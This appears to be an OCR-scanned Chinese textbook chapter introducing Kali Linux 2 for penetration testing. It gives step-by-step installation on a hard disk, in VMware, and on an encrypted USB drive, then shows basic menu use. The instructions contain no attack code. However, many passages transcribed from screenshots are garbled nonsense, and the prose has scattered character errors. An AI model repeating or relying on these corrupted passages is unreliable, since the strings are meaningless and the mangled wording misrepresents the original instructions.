家 的 确 不 会 选择 使 用 Windows 来 完成 自己 的 工作 。 

打 个 比方 ， 若 Windows 是 轿车 ，Linux 是 卡车 ， 则 家 庭 用 车 ， 一 定 选 轿车 ， 开 着 舒服 ， 
但 是 如 果 要 进行 工程 建设 ， 则 是 卡车 大 显 身 手 的 时 候 。 现 在 进行 网 络 安全 渗透 测试 就 相当 于 
从 事 工 程 ， 这 时 最 好 的 选择 当然 是 Linux。 

Windows 环境 对 于 网 络 做 出 了 大 量 的 限制 ， 因 而 很 多 程序 无 法 实现 正常 的 功能 。 另 外 ， 
由 于 了 Python 的 一 些 库 文件 无 法 在 Windows 环境 下 正常 运行 ， 所 以 本 书 的 所 有 实验 使 用 的 操 
作 系 统 都 采用 了 Kali Linux 2。 

在 本 章 中 将 会 介绍 Kali Linux 2 这 个 世界 上 最 为 著名 的 渗透 测试 系统 。 在 这 一 章 中 将 会 
围绕 以 下 三 个 方面 展开 学 习 。 

(1) Kali Linux 2 的 安装 。 

(2) Kali Linux 2 的 常用 操作 。 

(3 ) VMware 的 高 级 操作 。 


2.1 KaliLinux 2 介绍 
Kali Linux 2 是 一 个 为 专业 人 士 所 提供 的 渗透 测试 和 安全 审计 操作 系统 ， 它 是 由 之 前 大 
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4 MASAY Back Track 系统 发 展 而 来 。Back Track 系统 曾经 是 世界 上 最 优秀 的 渗透 测试 操作 系 
统 ， 取 得 了 极 大 的 成 功 。 之 后 Offensive Security 对 Back Track 进行 了 升级 改造 ， 并 在 2013 
年 3 月 推出 了 胃 新 的 Kali Linux 1.0。 相 比 Back Track, Kali Linux 提供 了 更 多 更 新 的 工具 。 
之 后 ，Offensive Security 每 隔 一 段 时 间 都 会 对 Kali 进行 更 新 ， 在 2016 年 又 推出 了 功能 更 为 
强大 的 Kali Linux 2。 目 前 最 新 的 版 本 是 2017 年 推出 的 Kali Linux 2017.1。 在 这 个 版 本 中 包 
含 13 个 大 类 超过 300 个 程序 ， 几 乎 涵盖 了 当前 世界 上 所 有 优秀 的 渗透 测试 工具 。 如 果 读 者 
之 前 没有 使 用 过 Kali Linux 2， 那 么 相信 在 你 打开 它 的 瞬间 ， 绝 对 会 被 里 面 数量 众多 的 工具 所 

需要 注意 的 一 点 是 ，Kali Linux 本 身 并 不 是 一 个 新 的 操作 系统 ， 而 是 一 个 基于 Debian 的 
Linux 发 行 版 。 如 果 读 者 熟悉 Debian， 那 么 使 用 Kali Linux 将 会 十 分 容易 。 不 过 Kali Linux 
也 提供 了 类 似 Windows 的 图 形 化 操作 界面 ， 即 使 此 前 完全 没有 使 用 Linux 的 经 验 ， 也 可 以 轻 
易 上 手 。 


2.2 Kali Linux 2 安装 


和 普通 的 应 用 软件 不 同 ， 操 作 系 统 的 安装 一 直 都 是 一 件 比较 麻烦 的 事 。 而 且 和 只 能 安装 
在 计算 机 上 的 Windows 操作 系统 不 同 ，Kali Linux 可 以 说 是 一 个 几乎 能 安装 到 任何 智能 设备 
上 的 操作 系统 。 计 算 机 、 平 板 、 手 机 、 虚 拟 机 、U 盘 、 光 盘 都 可 以 成 为 Kali Linux 的 载体 。 
另外 ， 现 在 极为 流行 的 Raspberry Pi PLAH WEIR”, EA RPI) 也 可 以 安装 Kali 
Linux。 甚 至 连 亚马逊 公司 推出 的 云 计算 服务 平台 AWS 中 也 提供 了 装 有 Kali Linux 系统 的 
主机 。 

下 面 就 来 介绍 其 中 几 种 最 为 常用 的 安装 方式 。 


2.2.1 将 KaliLinux 2 安装 在 硬盘 中 


首先 到 https:/www.kali.org/downloads/ 下 载 Kali Linux2 的 安装 镜像 ， 本 书 采用 的 Kali 
版 本 为 2017.1 版 。 如 果 读 者 之 前 为 计算 机 安装 过 Windows 操作 系统 ， 就 会 发 现 这 个 安装 过 
程 其 实 很 简单 ， 这 里 以 完整 版 的 32 位 Kali 安装 为 例 进 行 介绍 。 

Kali Linux 2 对 系统 硬件 的 需求 很 小 ， 几 乎 现在 所 有 的 计算 机 都 可 以 满足 。 当 然 在 更 高 
配置 的 计算 机 上 可 以 更 加 流畅 地 运行 Kali Linux 2。 下 面 列 出 了 官方 给 定 Kali Linux 2 安装 的 
最 低 硬 件 要 求 。 

(1 ) Kali Linux 2 安装 最 少 需要 20GB 的 硬盘 空间 。 

(2 ) 对 于 1386 和 AMD64 架构 ，KaliLinux 2 推荐 2GB 或 者 以 上 的 内 存 空间 ， 最 小 为 1GB。 

(3) CD-DVD 启动 /USB 启动 支持 。 
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接 下 来 开始 Kali Linux 2 的 安装 过 程 ， 这 个 过 程 可 以 分 成 两 个 步骤 。 第 一 步 先 将 镜像 文 
件 刻录 到 U 盘 或 者 光盘 上 ; 第 二 步 再 通过 U 盘 或 者 光盘 启动 来 安装 系统 。 

首先 介绍 如 何 将 下 载 好 的 kali-linux-2017.1-i386.iso 文件 刻录 到 光盘 上 或 者 可 盘 上 ， 鉴 
于 现在 的 系统 几乎 都 采用 了 U 盘 安装 ， 所 以 这 里 只 介绍 刻录 步骤 。 

第 一 步 : 使 用 UltraISO 打开 下 载 的 kali-linux-2017.1-i386.iso 文件 ， 如 图 2-1 所 示 。 


XAA BEA 启动 6) IRM WRO) 帮助 (H) 


工程 文件 另存 为 .。 Ctrl+Alt+S 


BA ML.. 
IML REA 1S0. 


ü 
DOXA RG G) We Cin om Wy ISO Ples 
文人 名 EDE] awna 


版 可 所 有 CEEE Systems, Inc. 
图 2-1 使 用 UltraISO 打开 Kali Linux 2 的 镜像 文件 
第 二 步 : 单 击 菜单 栏 上 的 “启动 ”选项 ， 然 后 在 弹出 的 菜单 中 选中 “ 写 入 硬盘 映像 …” 
如 图 2-2 所 示 。 


图 uhralSO - DA 二 下 载 Wali-linux-20171-i336jso FS ` | 
[XRP RGG) | Em) AN SO) WH 


"=a 


2017-04-16 15:28 
634 XR 2017-04-16 15:28 
92KB KR 2017-04-18 15:17 
654 KB DPHE 2017-04-16 15:27 
0 zik 2017-04-16 15:17 
56291 KB KEFR 2011-04-16 15:28 
708 kik 2017-04-16 15:27 
2,624,211.. 文件 夹 2017-04-18 15:26 
126,364 m 文件 夫 2011-04-16 15:17 
93 Xt 2017-04-16 15:26 
Tinta in£ 133 Setm Tnfarmatian oT- 1527 7 
*L——əƏ— v k -. -.B,-_,—— 
z ER O @ a) REC Wrers\ainin Docment:\iiy ISO Files 
LESAN B 小 
文件 名 大 小 类 型 日 期 /时 间 
由 四 gasta B 
m am 
m c) 
m o) y 
WARE (c)2002-2016 EZB Systens, Tac. KBAR: 7 文件 ，1208 KB 本 地 目录 : 0 文件 0 


图 2-2 选中 “ 写 入 硬盘 映像 …” 


第 三 步 : 在 弹出 的 “ 写 入 硬盘 映像 ”对 话 框 中 ， 首 先 单 击 “ 格 式 化 ”按钮 对 U 盘 中 的 数 
据 进行 格式 化 ， 然 后 单 击 “ 写 人 ”按钮 ， 如 图 2-3 所 示 。 
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isla u n ES) 
Ae: [m =] 
Ha 事件 | 
Winders 7 v6 1 Daila T001 Gerviee Pak 1) 
EF 099 34:23 G:, 4 GHS USB DISK 1100 


+g D I; 


Wai (g. ¿Dsm B O HN e) MRGG 


BEI: PARERE irori ise 


SARE: (mom) | 
RRE: E z) [uma] 
HM: o EAMA: woo eiA: 00:00:00 
Z — — >] 
aR oms 
CE a [RE ) zm 


图 2-3 将 镜像 中 的 文件 写 人 到 了 盘 中 


现在 已 经 制作 好 了 一 个 Kali Linux 2 的 系统 安装 盘 ， 接 下 来 就 可 以 在 计算 机 中 安装 系统 
了 。 首 先 需 要 将 计算 机 设置 为 U 盘 启 动 ， 然 后 执行 如 下 步 又。 

第 一 步 : 启动 计算 机 后 ， 可 以 看 到 Kali Linux 2 的 启动 界面 ， 这 里 列 出 了 Kali Linux 2 
设计 者 的 忠告 :“the quieter you become, the more you are able to hear”( 越 安静 ， 听 到 的 就 
会 越 多 )。 在 这 里 需要 选择 安装 的 类 型 ， 将 Kali Linux 2 安装 到 硬盘 主要 有 第 6 项 “Install” 
(基于 文本 的 安装 方式 ) 和 第 7 项 “Graphical install ”( 基 于 图 形 化 的 安装 方式 ) 两 种 ， 这 里 以 
“Graphical install ”为 例 ， 如 图 2-4 所 示 。 


[KALI] | 


“the quieten you VEcome, t 


图 2-4 Kali Linux 2 的 启动 界面 
第 二 步 : 选择 安装 系统 所 使 用 的 语言 ， 选 择 “中 文 (简体 ， 如 图 2-5 所 示 。 
第 三 步 : 系统 弹出 一 个 提示 ， 提 醒 使 用 简体 中 文 ， 系 统 并 不 会 完全 以 中 文 显 示 ， 很 多 地 
方 仍 然 会 以 繁体 中 文 或 者 英文 显示 。 这 里 选择 “是 ”， 如 图 2-6 所 示 。 
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Select a language 


Choose the language to be used for the installation process. The selected language will also be the 
default language for the installed system. 


Chinese (Iraditiona) - PRMD 
Croatian - Hrvatski 


Czech - Čeština 
Danish - Dansk 
Dutch Nederlands 
Dzongkha - šm 
English + English 
Esperanto - Esperanto 
Estonian ~ Eest 
Finnish Suomi 
Freneh Francais 
Galician Galego 
Georgian ha 
German Deutsch 


Sereenshot Goga | [ continue 


an-an 


maasrmansnarau. 
maenrwsnnueauswnay sakunayenugaunaszaz, qa. MEDERI , MAUTTAR, 


Wrgwasman. AAMBTASR-MERTMETERA. 
#unanuzsasas > 


Os 
omj 


图 2-6 选择 一 种 语言 
第 四 步 : 选择 所 在 的 区 域 ， 如 图 2-7 所 示 ， 这 里 选择 “中 国 ”。 


wnnaqewqrasmenumunntacmnarseGaq atanayewgunss. 


ARRRSFRENASTSMERNB. NEARIHENTIS Wan 'HH'. 
ms. Zen 


m rm 
图 2-7 选择 区 域 
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第 五 步 : 选择 要 使 用 的 键盘 设置 ， 这 里 选择 “汉语 ”， 如 图 2-8 所 示 。 


图 2-8 选择 语言 


第 六 步 : 现在 需要 为 系统 输入 一 个 主机 名 。 在 这 个 例子 中 ,输入 “Kali” 作 为 主机 名 ， 
如 图 2-9 所 示 。 


wessanamna, 


Zessnaonasnawn-te, RE TE ER ,HAN RE 
r 

sne: 

=m 


] 


图 2-9 设置 主机 名 
第 七 步 : 在 这 里 要 输入 一 个 域名 ， 如 果 没 有 ， 随 意 填写 一 个 即 可 ， 如 图 2-10 所 示 。 


amerianwsan- as . MMEENSZE. ERRAN com net. edust org AE. LMEEEOE-AANNIA, S 
UMEN- , DARAS ZERHMADASER- na. 
86: 


[Cer 


图 2-10 设置 域名 
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第 八 步 : 为 使 用 该 系统 的 root 用 户 创建 一 个 密码 ， 这 个 密码 应 该 尽量 复杂 一 些 ， 如 
图 2-11 所 示 。 


设置 用 户 和 密码 


| 您 需要 为 “root” 用 户 ( 即 系统 管理 员 帐 号 ) 设置 一 个 密码 。 如 果 秋 喜 或 无 交 格 的 用 户 获得 了 root 
| 放量 一 个 下 要 出 的 TDot EN. ETARE- MEEFAHHARNS 


一 个 安全 的 密码 应 该 量 由 字母、 数字 和 标点 符号 组 合 而 皮 . 而 且 要 定 姑 更 新 - 


权限 将 可 能 会 导致 灾难 性 的 结果 ， 因 此 您 应 
单词 或 者 一 个 跟 您 本 人 有 紧密 关 系 的 词语， 


| 根 用 户 不 应 使 用 空 密码 。 如 时 您 将 此 留 空 ， 根 用 户 账户 会 被 禁用 且 系 境 的 初始 用 户 账户 会 被 给 予 权限 通过 “sudo” 人 症 令 获 兰 根 用 户 权限 , 
| 请 注意， 您 特 不 会 看 到 所 输入 的 密码 内 容 。 
| Root APER : 


IC 
| O Show Password in Clear 
| 为 了 保证 您 的 认 码 正确 无 误 ,请 再 次 输入 相同 的 root EA, 
请 再 次 输入 启 友 以 验证 其 正确 任 : 
e000 
‘OD Show Password in Clear 
| 


[mmam | [ s= J[ wa J 

图 2-11 28 Kali Linux 2 设置 密码 
第 九 步 : 这 时 需要 设置 分 区 ， 默 认 情 况 可 以 选择 “使 用 整个 磁盘 ” 即 可 。 这 里 还 提供 了 
LVM ( Logical Volume Manager, HERA) 功能 ， 使 用 LVM 可 以 在 安装 完成 后 管理 分 
区 和 调整 分 区 大 小 。 对 于 刚 接触 Kali Linux 2 的 用 户 并 不 推荐 使 用 LVM。 如 果 读 者 对 Linux 


非常 熟悉 ， 也 可 以 选择 “手动 "， 如 图 2-12 所 示 。 
磁盘 分 区 


| 安装 程序 名 指导 您 采用 各 种 标准 方案 进行 磁盘 分 区 。 如 果 您 识 鸡 ,您 也 可 以 手动 反 作 。 如 果 选 择 了 分 区 向 导 ， 稍 后 您 还 是 有 机 会 检查 和 修改 | 
aramam. 


| 如果 您 选 拉 使 用 分 区 向 号 对 整个 磁盘 计 行 分 区 ， 下 一 步 将 询问 您 要 使 用 哪个 磁 鳃 。 
| 
HEHE: 


| | 向 导 - 使 用 整个 磁盘 并 配置 LVM 
向 导 - 使 用 整个 磁盘 并 配置 加 密 的 LYM 
手动 


图 2-12 为 Kali Linux 2 设置 分 区 
第 十 步 : 选择 要 分 区 的 硬盘 ， 如 图 2-13 所 示 。 
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站 m 


图 2-13 磁盘 分 区 


第 十 一 步 : 要 根据 需求 进行 选择 ， 这 里 如 果 不 知道 如 何 选择 ， 就 选择 第 一 个 方案 
14 所 示 。 


wase 
EE 
SCSI (0,0,0) (sda) VMware, VMware Virtual S: 21.5 GR 


MERATASARPFRMIRIGHE, LMEFAAT, NANT-NE. 
sang: 


% home nú # wz 
home, Nar 和 tmp 3 tti elan 


— Can ]L J 


图 2-14 将 所 有 文件 放 在 同一 个 分 区 中 


第 十 二 步 : 单 击 “ 继 续 ” 按 钮 后 ， 将 开始 安装 工作 ， 如 图 2-15 所 示 。 


REN, uTmnireisawaws,s qa. suewmuasme-—resuea, 


urgarpuspang: 
Scsn (0,0,0) tada) 


下 分 本格 式 化 
SCSIL (0,0,0) (ada) GË pm 1 PARELS ota 
Scsn (0,0,0) (sda) RE EHE 5 PTERLEY» swap 


Oas 
ow 


图 2-15 确定 要 格式 化 的 分 区 


， 如 
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< 
第 十 三 步 : 开始 系统 的 安装 过 程 ， 需 要 耐心 等 待 一 些 时 间 ， 如 图 2-16 所 示 。 
masma || OO C 
图 2-16 Kali Linux 2 的 安装 过 程 
第 十 四 步 : 配置 网 络 镜像 ，Kali Linux 2 使 用 中 心 源 来 发 布 软件 ， 这 里 选择 “是 ”， 如 
图 2-17 所 示 。 


[msnm | 


Ce (Ce) 
图 2-17 Kali Linux 2 的 配置 软件 包 管理 器 
第 十 五 步 : 安装 GRUB ， 如 图 2-18 所 示 。 


RADNER nO manane SG ION RNS 

人 
canum umare. 

MORUE 合肥 EA? 

cs 

ew 


Ce ][ sa ] 
图 2-18 将 GRUB 安装 到 硬盘 
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第 十 六 步 : 选择 GRUB 的 安装 位 置 ， 这 里 保留 默认 设置 即 可 ， 如 图 2-19 所 示 。 


将 GRUB 安装 至 硬盘 


您 需要 通过 将 GRUB 启动 引导 器 安装 到 可 启动 设备 上 以 使 新 安装 的 系统 能 够 启动 。 通 常 的 作法 是 将 GRUB 安装 到 您 第 一 块 硬盘 的 主 引 导 记录 
(MBR) 上 。 如 果 您 愿意 ， 也 可 以 将 GRUB 安装 到 要 动 器 的 其 他 地 方 ， 或 者 其 他 的 村 动 闫 上 ， 甚 至 还 可 以 安装 到 一 张 软 1 
88305 S oi ; 


手动 输入 设备 


manm | am 
图 2-19 安装 启动 引导 器 的 设备 
第 十 七 步 : 到 此 系统 已 经 安装 完毕 ， 单 击 “ 继 续 ”按钮 重启 系统 ， 就 可 以 进入 安装 好 的 
Kali Linux 2， 如 图 2-20 所 示 。 


Installation complete 
Installation is complete; so it is time to boot into your new 


stem. Make sure to remove 
Tr 


manm 返回 
图 2-20 结束 安装 进程 
HHE U AERUS 


户 名 “root” 和 第 八 步 中 设置 的 密码 进行 登录 。 


三 新 启动 计算 机 ， 操 作 系统 的 用 户 登 录 界 面 如 图 2-21 所 示 ， 这 里 可 以 使 用 用 
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图 2-21 KaliLinux 2 的 登录 界面 


2.2.2 在 VMware 虚拟 机 中 安装 Kali Linux 2 

在 现实 生活 中 ， 你 可 能 会 遇 到 这 个 问题 ， 很 多 工作 必须 在 Windows 下 来 完成 ,那么 往往 
需要 保留 Windows， 另 外 还 要 在 计算 机 上 安装 Kali Linux 2 操作 系统 。 这 时 通常 有 两 个 选择 ， 
一 是 安装 双 系 统 ， 二 是 使 用 虚拟 机 。 从 使 用 方便 的 角度 来 说 ， 建 议 读者 使 用 第 二 种 方法 。 
因为 虚拟 机 的 最 大 好 处 就 是 可 以 在 一 台 计 算 机 上 同时 运行 多 个 操作 系统 ， 所 以 可 以 获得 的 
其 实 不 只 是 双 系 统 ， 而 是 多 个 系统 。 这 些 操作 系统 之 间 是 独立 运行 的 ， 与 实际 上 的 多 台 计 
算 机 并 没有 区 别 。 但 是 模拟 操作 系统 的 时 候 会 造成 很 大 的 系统 开销 ， 因 此 最 好 加 大 计算 机 
的 物理 内 存 。 

目前 最 为 优秀 的 虚拟 机 软件 包括 VMware Workstation 和 Virtual Box， 这 两 个 软件 的 操作 
都 很 简单 ， 这 里 以 VMware Workstation 为 例 。VMware Workstation 的 较 新 版 本 为 12.3.7， 建 
议 读者 在 使 用 的 时 候选 择 最 新 的 版 本 。 

第 一 步 : 在 VMware Workstation 的 官方 网 站 ( https://www.vmware.com/products/worksta- 
tion.html) 下 载 安装 程序 。 国 内 很 多 下 载 网 站 也 都 提供 了 VMware Workstation 的 下 载 。 

第 二 步 : 开始 运行 VMware Workstation 的 安装 程序 ， 这 个 安装 的 过 程 很 简单 ， 这 里 不 再 
逐步 介绍 。 

第 三 步 : 启动 VMware Workstation 程序 ， 启 动 以 后 的 界面 如 图 2-22 所 示 。 
第 四 步 : 在 VMware Workstation 中 安装 一 个 新 的 操作 系统 。 首 先 在 菜单 栏 上 选择 “文件 ” 
选项 卡 ， 然 后 在 弹出 的 下 拉 菜 单 中 选择 “新 建 虚拟 机 ”。 
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图 2-22 VMware workstation 的 启动 界面 
第 五 步 : 弹出 一 个 “新 建 虚拟 机 向 导 ”， 这 里 选择 “典型 ” 即 可 ， 如 图 2-23 所 示 。 
第 六 步 : 为 操作 系统 选择 一 个 安装 文件 ， 可 以 使 用 安装 光盘 ， 也 可 以 使 用 下 载 的 光盘 映 
像 (iso XPE), 根据 安装 文件 的 不 同类 型 ， 做 出 对 应 的 选择 ， 如 图 2-24 所 示 。 


安装 客户 机 操作 系统 
让 包 如 隔 物 哩 所 ， 知 要 操作 系统 "您 析 如 但 安装 害 户 机 操作 大 统 ? 
欢迎 使 用 新 建 虚 拟 机 向 导 
安装 来 源 : 
| WORKSTATION; fwipien tran” II FREFAROW: 
£ arie AIMS 
ORSU 
MINAM MABR Workstation 12.x 
ERN I 
© BX) O RRRA TNM: 
ARREA 5CSI pasan, ewigan DARET SkaiHnux-2017.1-386.50 5 
U SE Vivare PE E EE EN 
你 需要 指定 要 安装 久 要 人 不 统 
D 稍 后 安装 操作 系统 (5)。 
-于 的 雇 机 构 包 全 一 个 空白 证 盘 。 
t-sw) | swa] o ma an ) ST 
一 JJ -t i| 
图 2-23 新 建 虚拟 机 向 导 图 2-24 安装 程序 光盘 映像 文件 


第 七 步 : 根据 所 安装 系统 的 类 型 ， 选 择 对 应 的 操作 系统 ， 例 如 这 里 安装 的 是 Kali Linux, 
这 个 版 本 是 基于 Debian 8.x 开发 的 ， 所 以 在 “客户 机 操作 系统 ”中 选择 Linux, RAE 版 本 
里 选择 Debian 8.x， 如 图 2-25 所 示 。 
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第 八 步 : 设置 虚拟 机 的 名 称 和 存放 的 位 置 ， 这 里 注意 最 好 选择 一 个 合适 的 名 称 ， 例 如 
kali2-linux。 在 下 面 的 “位 置 ”处 为 虚拟 的 操作 系统 选择 一 个 存放 目录 ， 如 图 2-26 所 示 。 


| ARRANBERA ] | szenn 
此 虚拟 机 中 将 安装 哪 种 操作 系统 ? 您 要 为 此 虚拟 机 商用 什么 名 称 ? 
kasuni SNERO: 
© Microsoft Windows(W) iDP-inux 
Linux(L) 
© Novell NetWare(E) EAW: 
r 5 DAERA WƏI2-ux 本 
ORMO) TIR AT REER EAE - 
KEV 
[Debian 8.x m 
ET <t-58)) [P—-2#00>][ a — <t-50 | (zaw) C ana 
一 一 
图 2-25 选择 客户 机 操作 系统 图 2-26 为 虚拟 机 命名 


第 九 步 : 给 这 个 虚拟 系统 分 配 物 理 硬盘 空间 ， 这 里 使 用 默认 的 20GB 作为 最 大 磁盘 大 小 ， 
不 过 VMware Workstation 一 开始 只 会 为 其 分 配 很 小 的 空间 ， 在 使 用 虚拟 机 的 时 候 ， 这 个 空 
间 会 逐渐 变 大 ， 如 图 2-27 所 示 。 在 本 书 所 有 的 实验 结束 之 时 ， 这 个 空间 可 能 要 扩大 到 60GB 
左右 。 

第 十 步 : 单 击 “ 完 成 ”按钮 结束 虚拟 机 的 安装 过 程 ， 如 图 2-28 所 示 。 


MANE URERA 
8220620 Ph ARONEN- 然后 可 以 支 装 Debian 8.x- 
得 所 机 的 三 盘 八 一 个 或 名 个 文件 存 人 在 主机 的 理 磺 生 中 。 这 些 文件 最 很 || anamannan: 
小 ， EE AER ahh i9py > ZPAETEAEA © 
名 称 : kal2-inux 
ujv j: .0 =] fem: DARN Kal2-Inux 
Epi EEE 25 = 版 本 : Workstation 12.x 
针对 Debian 8.x 的 建议 大 小 : 20 6B 操作 系统 : Debian 8.x 
z = re 硬盘 : 20 GB 
ET SO) 内 不: 512m8 
昌 将 Mit 盘 折 分 成 个 文件 (M) miana: NAT 
ARRE, MOUREN ZABAN. aenigma ee 其 他 设备 : CD/DVD, USB 控制 器, 声卡 
WI Ts 
Esv>] CC wm C= 
图 2-27 指定 磁盘 容量 图 2-28 创建 完成 


第 十 一 步 : 重新 启动 虚拟 机 之 后 ， 会 出 现 如 图 2-29 所 示 的 Kali 安装 启动 界面 ， 接 下 来 
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的 安装 过 程 和 2.2.1 节 中 是 一 样 的 。 


KALI 


“the quieter you Become more you are able to hear" 


Boot menu 
Livs 
L 
Li 
Liu 
Liue 
Im: 1 
Graphical install 
I 


图 2-29 在 VMware 中 安装 Kali Linux 2 


除了 上 面 介 绍 的 在 虚拟 机 中 安装 Kali Linux 2 之 外 ， 还 可 以 选择 直接 下 载 Offensive 
security 所 提供 的 虚拟 机 映像 文件 ， 如 图 2-30 所 示 。 下 载 地 址 为 https://www.offensive-security. 
com/kali-linux-vmware-virtualbox-image-download/。 本 书 中 所 使 用 的 实例 都 是 使 用 在 该 地 址 
下 载 的 Kali Linux 32 bit VM PAE 下 进行 调试 的 ， 经 测试 这 也 是 最 为 稳定 的 一 个 版 本 。 所 以 在 
本 书 的 学 习 过 程 中 ， 建 议 读者 选择 相同 的 版 本 


Courses Certifications Online Labs Penetration Testing 


= W 
Linux Community page. These images have a detault password of “toor” and may have pre-generated SSH host keys. 


Kali Linux VMware Images Kali Linux VirtualBox Images — Kal Linux Hyper-V Images 


Image Name Torrent Size Version SHA256Sum 


Kali Linux 64 bit VM Torrent | 2.16 | 2017.1 — 887244a6977164621c2c771271500039608738fcb71333847b9ed9758a9efcb1 


Kali Linux Light 64bit VM | Torrent | 0.5G 2017.1 。 2ee5d3ac8b9d699957936ale58cb3adec2d5lbdleclcb6198dldbc88308525bc 


Kali Linux Light 32 bit VM | Torrent | 0.5G | 2017.1 | 67e591c7B6f80c799300b79907cbedc8Se8729e563671b3bced561ðccafb51d 


图 2-30 Kali Linux 32 bit VM PAE 的 下 载 地 址 


下 载 之 后 是 一 个 压缩 文件 ， 将 这 个 文件 解压 到 指定 目录 中 。 例 如 ， 作 者 将 这 个 文件 解压 
到 了 E:Kali-Linux-2017.1-vm-i686 目录 。 那 么 启动 VMware 之 后 ， 在 菜单 选项 中 依次 选中 


IE = apas, 
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， 如 图 2-31 所 示 。 


加 ”连接 到 VMware vCloud Air(V)... 
d) ARUP). 

SHA OVF(E)... 
í mateshuata(N)..- 


退出 00 


图 2-31 在 菜单 选项 中 依次 选中 “文件 ”一 “打开 …” 


然后 在 弹出 的 文件 选择 框 中 选中 Kali-Linux-2017.1-vm-i686.vmx， 如 图 2-32 所 示 。 


nf ~ 
Ji < Kali-Linux-2017.1.. » Kali-Linux-2017.1-vm-i686 » > | ++ || Z Kat-Lnux-2017.1-vm-¿.. P 
组 织 ” mzer =- me 
g z 修改 日 其 - 
< =u J Kali-Linux-2017.1-vm-i686.vmxlk 2017/8/2 14:20 
|D) Kali-unux-2017.1-vm-i686.vmx 2017/8/2 12:33 
SURN 
D reae c) 
aTe o) 
amean E 
Ji Kali-Linux-2017.1-wn-i686 
Ji netca 
i se | Ú 
IBN: Kali-Unux-2017.1-wm-i686.vmx + [mume z) 
Ooa) 
= 


图 2-32 选中 Kali-Linux-2017.1-vm-i686.vmx 


双击 打开 之 后 ， 在 VMware 的 左 侧 列表 中 ， 就 多 了 一 个 Kali-Linux-2017.1-vm-i686 £ 


统 ， 双 击 这 个 选项 就 可 以 启动 这 个 系统 了 。 


22.3 在 加 密 U 盘 中 安装 Kali Linux 2 


上 面 介绍 的 安装 方法 和 Windows 操作 系统 没有 太 大 区 别 。 读 者 可 以 按照 这 种 方法 将 Kali 
Linux 2 安装 到 自己 的 台式 计算 机 或 者 笔记 本 上 。 可 是 在 现实 生活 中 ， 即 使 是 笔记 本 电脑 ， 也 
不 可 能 总 是 随身 携带 。 不 过 ， 在 现实 世界 中 ,计算 机 是 随处 可 见 的 ， 只 是 这 些 设备 大 都 不 可 
能 安装 Kali Linux 这 种 专业 操作 系统 。 如 果 可 以 将 Kali Linux 安装 到 UU 盘 ， 然 后 在 任何 计算 
机 上 运行 U 盘 中 的 系统 即 可 (注意 这 里 和 用 T 盘 作 为 安装 盘 不 同 ， 这 里 指 的 是 将 U 盘 插 入 


主机 后 直接 使 用 )。 
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日 本 著名 的 黑客 题材 电视 剧 《 血 色 星期 一 》 中 出 现 过 这 样 一 个 情节 ， 由 三 浦 春 马 饰演 的 


器 盘 在 当年 引起 了 很 多 人 的 关注 ， 几 乎 成 了 传说 中 的 神器 。 

现在 介绍 一 下 这 款 神器 的 制作 方法 。 首 先 需 要 一 个 U 盘 ， 最 好 不 要 小 于 32GB， 通 常 来 
说 64GB 的 U 盘 更 合适 ， 因 为 后 期 在 进行 软件 安装 和 更 新 的 时 候 ， 系 统 会 很 快 地 变 大 。 

将 Kali Linux 2 安装 到 TU 盘 上 的 方法 有 很 多 种 ， 下 面 介绍 使 用 虚拟 机 进行 安装 的 方法 ， 
这 个 安装 过 程 和 之 前 介绍 的 过 程 大 部 分 是 一 样 的 ， 但 是 需要 注意 以 下 几 点 。 

第 一 ， 在 出 现 系统 启动 界面 之 前 将 U 盘 插 入 到 计算 机 中 ， 并 在 出 现 启动 界面 的 时 候 右 击 
虚拟 机 右 下 角 的 移动 设备 挂 载 按钮 ， 如 图 2-33 所 示 。 

在 弹出 的 下 拉 菜 单 中 选中 “连接 ( 断 开 与 主机 的 连接 )” 选 项 ， 如 图 2-34 所 示 。 


连接 ( 断 开 与 主机 的 连接 )(C) 
— EO 
Raws a BEREH 


图 2-33 Kali Linux 2 的 启动 界面 图 2-34 Kali Linux 2 的 启动 界面 


在 新 弹出 的 对 话 框 中 单 击 “ 确 定 ”按钮 ， 这 时 真实 计算 机 就 看 不 到 这 个 设备 了 ， 这 个 设 
备 已 经 被 加 载 到 虚拟 机 中 。 


第 二 ,在 选择 磁盘 分 区 时 ， 要 选择 “向 导 - 使 用 整个 磁盘 并 配置 加 密 的 LVM”， 这 样 就 
可 以 为 U 盘 添 加 一 个 密码 ， 如 图 2-35 所 示 。 


mmReasemagasnaaumnasos T-e6nnenenaqsun. 
SERA: 


向 导 ANNIA 
9 -gmu+tm ala LVM 


和 


[manm | [ wa ][ wa | 


图 2-35 Kali Linux 2 的 磁盘 分 区 向 导 


第 三 ， 在 磁盘 分 区 选择 安装 目录 的 时 候 ， 要 选择 U 盘 而 不 是 硬盘 ， 如 图 2-36 所 示 。 
等 安装 完成 之 后 ， 一 个 装 有 Kali Linux 2 的 U 盘 就 制作 好 了 。 注 意 ， 虽 然 这 个 U 盘 系 统 
在 大 多 数 的 主机 设备 上 都 可 以 正常 运行 ,但 是 也 存在 少量 设备 不 兼容 的 问题 。 
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was 


#mammiamnunrnemnaqsemma esmismusnnamasnqumne. 
Wasp om mun: 


SCSI (0,0,0) (sda) - 21.5 GB vmware, vMware virtual S | 


SCS14 (0,0,0) (sdb) - 4.0 GB SMI USB DISK I 


C = JC= ) 


图 2-36 WFE U Ñ 


2.3 Kali Linux 2 的 常用 操作 


启动 Kali Linux 2 之 后 ， 可 以 看 到 一 个 和 Windows 相 类 似 的 图 形 化 操作 界面 ， 这 个 界面 
的 上 方 有 一 个 菜单 栏 ， 左 侧 有 一 个 快捷 的 工具 栏 。 单 击 菜单 上 的 “应 用 程序 "， 可 以 打开 一 
个 下 拉 菜 单 ， 所 有 的 工具 按照 功能 的 不 同 分 成 了 13 种 (菜单 中 是 有 14 个 选项 ， 但 是 最 后 的 
“系统 服务 ”并 不 是 工具 分 类 )。 当 选中 其 中 一 个 种 类 的 时 候 ， 这 个 种 类 所 包含 的 软件 就 会 以 
菜单 的 形式 展示 出 来 ， 如 图 2-37 所 示 。 


图 2-37 Kali Linux 2 中 的 菜单 
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但 是 这 里 展示 的 只 是 其 中 的 一 部 分 工具 ， 而 不 是 全 部 。 如 果 和 希望 看 到 所 有 应 用 程序 ， 可 
以 单 击 左 侧 的 快捷 工具 栏 最 下 方 的 显示 程序 按钮 ， 如 图 2-38 所 示 。 
这 时 在 屏幕 上 会 显示 出 全 部 的 应 用 程序 ， 如 图 2-39 所 示 。 


图 2-38 ”显示 全 部 程序 按钮 图 2-39 显示 出 来 的 全 部 程序 
这 时 直接 双击 图 标 就 可 以 启动 工具 。 另 外 ， 也 可 以 使 用 终端 的 命令 来 打开 工具 


